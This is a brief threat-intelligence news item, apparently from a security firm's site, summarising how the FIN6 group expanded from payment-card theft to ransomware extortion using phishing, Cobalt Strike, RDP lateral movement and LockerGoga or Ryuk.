Contact Contact Us

FIN6 Group Expands Attack Scope with Ransomware

The FIN6 cybercriminal group, which typically targets payment card details, has started attacking non-finance entities by using ransomware to extort compromised organisations. FIN6 targets internet-facing systems phishing attacks or exploiting misconfigurations or unpatched vulnerabilities. After gaining initial foothold, the hackers leveraged "living-off-the-land" techniques such as running PowerShell commands to install publicly available penetration testing tools, Cobalt Strike or Metasploit, for stealing credentials. With the stolen credentials, the hackers can move laterally within the organisation’s network usually via Windows' Remote Desktop Protocol. The compromised nodes are then assigned as malware distribution servers to stage either the LockerGoga or the Ryuk ransomware. FIN 6 is estimated to have extorted tens of millions of dollars since July 2018, in addition to stealing payment cards details from point-of-sale environments.

[1] Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware

Ensign InfoSecurity Singapore
30A Kallang Place
Singapore 339213

Tel: +65 6788 2882
Fax: +65 6788 3883